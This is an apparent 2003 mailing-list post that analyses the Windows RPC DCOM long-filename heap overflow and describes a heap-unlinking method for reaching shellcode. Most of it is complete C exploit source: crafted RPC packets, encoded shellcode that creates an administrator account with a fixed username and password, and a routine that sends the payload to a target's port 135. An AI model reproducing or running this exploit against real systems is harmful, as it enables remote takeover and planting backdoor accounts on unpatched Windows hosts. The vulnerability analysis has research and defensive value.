<<< Date Index >>>     <<< Thread Index >>>

The Analysis of RPC Long Filename Heap Overflow AND a Way to Write Universal Heap Overflow of Windows




The Analysis of RPC Long Filename Heap Overflow AND a Way to Write  Universal 
Heap Overflow of Windows 



Author&#65306;FLASHSKY
SITE&#65306;WWW.XFOCUS.NET&#65292;WWW.VENUSTECH.COM.CN WWW.SHOPSKY.COM
email&#65306;flashsky@xxxxxxxxxx
Venus Active Defence Research Center 
Thanks&#65306;
eyas(eyas@xxxxxxxxxx),benjurry@xxxxxxxxxx
Colleagues of Venus,and all menbers of xfocus
Translator:benjurry(benjurry@xxxxxxxxxx)

1,Analysis
 The RPC DCOM long file name heap overflow is similar to LSD's stack 
overflow,they all exist in CoGetInstanceFromFile API ,which was discoveried by 
Yuange@NSfocus on ,And MS has Fixed the vulnerability on the 10th,SEP.Now let's 
discuss the detail.
In the article of "The Analysis of LSD's Buffer Overrun in Windows RPC 
Interface",We had discussed the CoGetInstanceFromFile API,which can use UNC 
format ,and RPC DCOM program chekcks the servername of UNC,if the servername is 
NetBios name or IP of localhost(include "localhost" and "127.0.0.1"),then RPC 
DCOM will process the filename in UNC.

Here is the code:

.text:76151469                 push    20Ah
.text:7615146E                 push    edi
.text:7615146F                 push    hHeap
.text:76151475                 call    AllocHeap    <------------------Only 
allocate heap of 0X20A
.text:7615147B                 mov     edi, eax
.text:7615147D                 test    edi, edi
.text:7615147F                 jnz     short loc_76151491
.text:76151481                 push    [ebp+hMem]      ; hMem
.text:76151484                 call    ds:LocalFree
.text:7615148A 
.text:7615148A loc_7615148A:                           ; CODE XREF: 
sub_761513C5+4Bj
.text:7615148A                 mov     eax, 8007000Eh
.text:7615148F                 jmp     short loc_761514B9
.text:76151491 ; 
&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;?
.text:76151491 
.text:76151491 loc_76151491:                           ; CODE XREF: 
sub_761513C5+BAj
.text:76151491                 mov     eax, [ebp+hMem]
.text:76151494                 push    dword ptr [eax+18h] ; lpString2
.text:76151497                 push    edi             ; lpString1
.text:76151498                 call    ds:lstrcpyW    
.text:7615149E                 push    esi             ; lpString2
.text:7615149F                 push    edi             ; lpString1
.text:761514A0                 mov     [esi], bx
.text:761514A3                 call    ds:lstrcatW     
<------------------Here,exist the Heap Overflow for MS hadn't check the length 
of filename, 



 
2,A Way to Write  Universal Heap Overflow of Windows   
 By overlaying the Heap manager struct,we can modify the SEH or the return 
address of function while releasing the heap.But Heap Overflow was  recognized 
as difficult to exploit for locating shellcode. Because the Address of heap is 
not fixed ,there is no register or known address poiting the Shellcode,and we 
can't get the shellcode by OPCODE such as JMP ESP.
     Is there no way to exploit?NO!
    
As we know, with normal heap manager struct, Heap operation is list as 
following:    
     Content:ADDR1 ADDR2
    Operation:MOV [ADDR2]&#65292;ADDR1
           MOV [ADDR1+4]&#65292;ADDR2
     After operating ,the ADDR2 is modified to adress of SEH,ADDR1 is address 
of shellcode.And we can get the right when we handle the SEH.But how to locate 
the shellcode?
    By researching,we find that if we  construct given heap manager structure 
&#65292;it will do as following:
     Assume ADDR3 is the up heap link of ADDR1
     Content:ADDR1 ADDR2
     Operation:MOV [ADDR2]&#65292;ADDR3
           MOV [ADDR3]&#65292;ADDR1
           MOV [ADDR3+4]&#65292;ADDR2

     Because ADD3 is located by system,we can execute the content of ADDR3 
handling SEH.Althougn we can't control the content of ADDR3 ,we can control the 
fist 8 bytes of ADDR3 by MOV [ADDR3]&#65292;ADDR1.That is enough &#65292;we can 
achieve JMP and jump to our shellcode .General ,the size between ADDR3 and 
ADDR1 is fixed in a given heap overflow, and we can extend this area by lots of 
NOP. If we can construct Heap manager structure like this ,then we can exploit 
Heap Overflow. At least we exploit the RPC long filename Heap Overflow.
    The mechanism of  exploit Universal Heap overflow can get from 
&#12298;Utilization of released heap structure and exploit of universal Heap 
overflow in windows &#12299;.
    Annotations&#65306;H D Moore utilizes this way in his  EXP of 
HDM&#65292;but he hadn't handled the problem of heap manager structure 
confusion,and it  is still not working 100%
.

3.The exploit of RPC long filename heap overflow    
    There is long time after I have solved how to locate the shellcode 
&#65292;but there is another trouble that it is abnormal when we use API in 
shellcode because the heap manager structure was destroyed . At last I find the 
way is to cover the default heap of PEB with another heap&#65306;
        mov    eax,fs:[0x00000018]  <---------the address of PEB
        mov eax,[eax+0x30]
        lea eax,[eax+0x18]            <---------get the address of default 
process heap base       
        mov ebx,0x170000   
        mov [eax],ebx                  <-----------modify to 0X170000
Attention&#65292;0X170000 is only good for windows 2K(Chinese 
version)+SP4+MS03-26. It is better if we create a new heap by HEAPCREATE in the 
shellcode ,then cover the default heap of PEB with this address. 

#########################################################
This part comes from eyas's research&#65292;(eyas@xxxxxxxxxx)

    Because Winsocket uses GHEAP,which was assigned as process default address 
at the initialization of  dll ,the heap  will be abnormal when call function of 
Winsock. Our advice is that shellcode doesn't include Winsock or shellcode 
seaches and modifies the GHEAP ,then calls Winsock.(For the address of GHEAP 
may be not fixed in many version,it will lost compatibility.

#########################################################
Another way to use API(include WINSOCKET API) is recover heap,because the 
structure of released chain is destroyed but not other structure ,So we can 
analyse chain,and recovered it,and then we can call API optionally.
You can read more form  my artic &#12298;Utilization of released heap structure 
and exploit of universal Heap overflow in windows &#12299;.


Here we list the sample code to exploit the heap overflow&#65306;
#########################################################


To avoid be utilized by scripts kids and worm directly,the code we list is not 
Universal&#65292;and
we explain the technology in the code 

#########################################################


Affected system &#65306;
    W2K+SP3+MS03-26
    W2K+SP4+MS03-26
    ADDR1&#65306;\xeb\x1e\x08\x00
         It is code of JMP 1E
    ADDR3&#65306;Here ADDR3 is the address of UNC heap.

      
    This code can exploit W2K SERVER+SP3/SP4+MS03-26&#65292;but in the 
condition of Login stutas in SP3,it doesn't work well for the net heap of 
foregoing released heap is not the structure our need to cover. 
    In SP4,it works very well.In the condition of  LOGOUT status in SP3 ,We 
nedd run it time after time.
    We shall be give a example for How to send packets and control Heap 
state,that we can make released heap and  exploit Universal this hole.
    
    
    We must modify the value of SEH according diffrent version.
The SHELLCODE add a user in administraor group ,username is SST,password is 557

   
   /*
        RPCDCOM2.c  ver1.1
        copy by FLASHSKY <flashsky@xxxxxxxxxx>  2003.9.14
   */
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



unsigned char sccnsp3sp4[]=
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"    

//SHELLCODE From  SAM ,THANKs !
//Add user SST,password is 557,
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90"     //
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x77\xe0\x43\x00\x00\x10\x5c\x00"
    "\xeb\x1e\x01\x00"//     FOR CN SP3/SP4+-MS03-26
    "\x4C\x14\xec\x7C"//    TOP SEH FOR cn w2k+SP4&#65292;must modify to SEH of 
your target's os 


//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form  my artic 
&#12298;Utilization of released heap structure and exploit of universal Heap 
overflow in windows &#12299;.
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

"\x04\x04\x00\x70\x00\x04\x40"
"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";


unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];

    printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
    printf("Code by FlashSky,Flashsky xfocus org\n");
    printf("Welcome to our Site: http://www.xfocus.org\n";);
    printf("Welcome to our Site: http://www.venustech.com.cn\n";);
    if(argc!=3)
    {
        printf("%s targetIP \n",argv[0]);
        printf("for cn w2k server sp3/sp4+ms03-26\n");
    }
    
    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    len1=sizeof(request1);
    len=sizeof(sccnsp3sp4);

    if(WSAConnect(sock,(struct sockaddr 
*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    memcpy(buf2,request1,sizeof(request1));
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;  
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4));
    len1=len1+sizeof(sccnsp3sp4);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;
 
    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    
    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
//    len=recv(sock,buf1,1024,NULL);
}

/*

*/